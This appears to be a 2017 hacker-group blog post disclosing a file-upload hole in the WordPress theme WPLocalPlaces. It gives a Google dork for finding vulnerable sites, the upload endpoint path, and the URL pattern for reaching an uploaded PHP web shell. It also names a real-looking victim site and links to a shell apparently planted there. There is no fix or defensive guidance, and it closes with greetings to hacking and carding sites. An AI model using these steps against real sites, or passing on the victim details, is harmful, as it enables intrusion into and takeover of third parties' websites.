Thursday, May 11, 2017

Wordpress Themes WPLocalPlaces Upload Vulnerability


INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title  : Wordpress Themes WPLocalPlaces Upload Vulnerability
Google Dork    : inurl:"/wp-content/plugins/spotlightyour/"
Locations      : Banjarmasin, Indonesia
Author         : ovanIsmycode
Contact        : ovanismycode@yahoo.com


Software Link  : http://freelancewp.com/wordpress-theme/wp-local-places/
#################################################################################################

[+] POC

Exp. Target :
- http://domain.com/wp-content/themes/WPLocalPlaces/

Exploit :
- /monetize/upload/index.php

Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php


[+]Demo

Live Target :
http://southbayautopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php
see it http://i.imgur.com/3NsmWdt.jpg

Shell Access :
http://southbayautopros.com/wp-content/uploads/2013/10/13820893341435692459.php
see it http://i.imgur.com/4e8hHzA.jpg
 
#################################################################################################
 
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, N035, -=[The Crows Crew]=-, Indonesian Hacker

thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
Load disqus comments

0 comments